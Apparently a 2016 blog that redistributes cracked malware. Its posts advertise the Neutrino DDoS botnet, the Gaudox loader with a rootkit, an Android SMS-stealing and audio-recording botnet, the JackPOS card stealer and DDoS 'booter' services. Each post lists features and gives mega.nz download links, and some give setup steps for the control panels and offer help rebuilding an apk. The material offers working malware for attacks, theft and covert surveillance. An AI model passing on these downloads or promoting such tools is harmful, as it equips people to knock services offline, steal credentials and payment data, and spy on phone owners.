Monday, 28 March 2016

Neutrino HTTP DDoS Botnet [Cracked by 0x22 & Lostit]




Neutrino Bot 

- The main functional 
* HTTP (S) flood (methods GET \ POST) 
* Smart DDoS
* AntiDDOS flood (Emulation js \ cookies) 
* Slowloris flood 
* Download flood 
* TCP flood 
* UDP flood 


* Loader (exe, dll, vbs, bat ... + can specify parameters for running the file) 
* Keylogger (Multilanguage) (support for virtual keyboards (removal of screenshots in the clique size 60x60)) (possibility to monitor the specified window) 
* Command shell (remote command execution using shell windows) 
* Stealing files by mask (eg bitcoin wallets) 
* Launch the browser with one of these links (aka Cheaters views) 
* Spoofing Hosts 
* Stilling Win keys 
* Reproduction (USB \ Archive) 
* Purity downloads (number found "neighbors" on the computer) 
* Identifying the installed AV (on all Windows except Server) 
* Update 
* Work through the gasket 

- Additional Features 
* Anti debugging 
* AntiVM 
* Detect sandboxes 
* Detect all online services automatic analysis 
* BotKiller 

* Bot protection (protection process \ file \ registry branches) 
* Unlimited number of concurrent commands (Some teams have a higher priority than others, and their execution stops others) 
* Unlimited number of backup domain 
* Quiet operation even under a limited account 
* Do not load the CPU 

- Functional admin 
* Flexible system for creating jobs 
* Detailed statistics for bots 
* Ability to give commands to each country separately or bot 
* Customizable otstuk bots 
* Sort bots in Articles IP \ Live \ Country \ OS 
* System Bans. 

- Weight uncompressed binary file ~ 50kb (PL - C) 
- Boat tested on the entire line of Windows, from XP to 8.1 (x32/64)

Download :
https://mega.nz/#!TYtWgL4J
!ncpizlqEBKU_vcJnpzMznxiA9g-JRMbyXk89FW_RqM4
https://mega.nz/#!TYtWgL4J!ncpizlqEBKU_vcJnpzMznxiA9g-JRMbyXk89FW_RqM4



[Update]Gaudox - HTTP Bot (1.1.0.1) | C++/ASM|Ring3 Rootkit | Watchdog |Antis |Stable

[Update]Gaudox - HTTP Bot (1.1.0.1) | C++/ASM|Ring3 Rootkit | Watchdog |Antis |Stable

Gaudox HTTP


Gaudox is a HTTP loader completely coded from scratch in C/C++ language with a few lines of Assembly, which means that it does not require of any dependencies ( C-Runtime, NET Framework, Java VM ). The bot has been fully tested and working on all Windows versions from Windows XP SP2 to Windows 10 (32/64-bit). It is also worth mentioning that I coded this bot with very efficient and stable designed code to handle thousands of connections at once.

Features:

Usermode Rootkit
Bot has Rootkit functionality which hides all bot resources and prevents from being accessed from explorer process. This feature does not drop any to disk, the code is internally embedded in the bot file and injected in the target process from memory. It is also has self-protection that prevents the hooks from being removed by third-party programs or any security tool. This feature is currently working on 32-bit systems.

Persistence/Watchdog
Bot prevents it from being removed from the system by bot killers, security tools or user actions. This feature is currently supporting process protection and working on both 32/64-bit systems but its maximum compatibility is in 32-bit.

Traffic Encrypted
The communication between the bot and the control panel is obfuscated. This prevents middle attacks.

Anti-Analysis/Research
Bot contains several methods for preventing from being analyzed by researchers or unauthorized users. some methods are from preventing static analysis by obfuscating code, data up to detect the presence of debuggers, avoid running the bot in virtualized environments, etc. some methods may not be mentioned.

Commands:

[+] Download and execute (Drop&Exec)
[+] Visit Website (Visible)
[+] Update Client
[+] Uninstall Client


Panel











How to install:
1) Open the Builder and create a new profile, you will use these values KEY #1 and KEY #2 in the panel.
2) Create a new database (recommended)
2) Open setup.php with browser and complete the form.
3) Delete setup.php and open login.php with browser.
5) When creating the bot clients do not forget to use the same profile you used to install the panel, otherwise the bots will not connect to the panel.

Code:
Bot

* Fixed issue with Uninstall command
* Anti-Virtual machine methods have been enabled

Panel

* Fixed issue with location
* Added captcha in login page
Download

Wednesday, 17 February 2016

Gaudox v1.1.0.0 - HTTP bot | C & ASM, 36kb











- Ring3 Rootkit
Includes Rootkit functionality, which hides all of its components from explorer process.
also worth mentioning that the rootkit prevents from being removed from the system and it's not implemented as a separate file so the bot will not write any file to the harddisk.
this feature is currently working only in 32-bit versions (XP-8.1).

- Persistence/Watchdog
This prevents it from being removed from the system by ensuring that the process is always running on the system.
Maximum compatibility of this feature is when the bot runs with administrator privileges.

- Traffic encrypted
The communication between the bot and the web panel is now encrypted.

- Web panel recoded
The panel has been completely recoded using PDO which makes it safer preventing SQL injection and other attacks.



How to install:
1) Open the builder and create a new profile, you will use these values Key1 and Key2 in the panel.
2) Create a database
2) Open setup.php
3) After installing go to login.php, delete setup.php
5) When creating the bot clients, do not forget to use the same profile you used to install the panel, otherwise the bots will not connect to the panel. 


Download : https://mega.nz/#!2QMjmBYL!OG0uazcKEIIcGTeY3JJdI_L__EAkxKKpsWmhsSosUB8

SmsBot Android Botnet




Features:
-Grabing all information about the victim (Phone Number, ICCID, IMEI, IMSI, Model, OS)
- Interception of incoming SMS messages and sending them to the web-panel and the control room.
- Call forwarding to any number
- Grabing all incoming and outgoing SMS
- Grabing all incoming and outgoing calls
- Record audio, sending it to the server (know what is happening around)
- Sending SMS to any room without the owner's knowledge

The apk work but the panel seems to have some problems. Bots are not showed.
The infected phone connect right to the panel, i know it because there are two folder created named with the imei number of the infected phone (in /sound and /listing) but nothing inside these folders and nothing inside the database...
Maybe that someone here make it working.

Let me know if you need help for decompil the apk changing the host, etc... then recompil it.

Note: At the first line of each php files of the admin panel change '<?' to '<?php' otherwise it will not work. (on many hosting, xampp included)

DOwnload :https://mega.nz/#!GZkzXbDK!Mcla-lIb-FbfNpd5ujiOAS9HHPW6aNNAsIA4eVhl0Yc

Friday, 5 February 2016

JackPOS Stealer

JackPOS Stealer



Download https://mega.nz/#!jN0SHBQZ!JH_FgAWNkMe9nfNcl4GRNZujZc3IUOhi1w80An0iGUI

Most Security Booter

Most Security Booter




Download https://mega.nz/#!GEU3TbLK!9SLo-z-JeJp3VRbPrHEsj5eprdj3GElGmh5DwcNjT04

FloristBooter 3.3

loristBooter 3.3

Feature:

[~]Added a skype Resolver to the Resolve page
[~]Added option to add your own shells to increase your boot
power.
[~]A counter checks how many shells you have added. Does
not check if the shells are working yet
[~]Improved the design of the booter (No random buttons
everywhere)
[~]Fixed the Geolocate system to make it simple
[~]Made the general feel sleeker and less clunky.
[~]Slight changes to the status page
[~]Increased the power quite significantly.
[~]Removed some minor features I felt didn't have a place.

Virus Scan Report:
Código:
https://www.virustotal.com/file/86430beda747b2bc9ce5679f656c51bda962dd3454b1a6a3d797eb7105277da8/analysis/


Download https://mega.nz/#!PJkH1bqQ!pNvLoD2U2KZZW7iTDEct9AeNT77s7A58TvU7kIozISs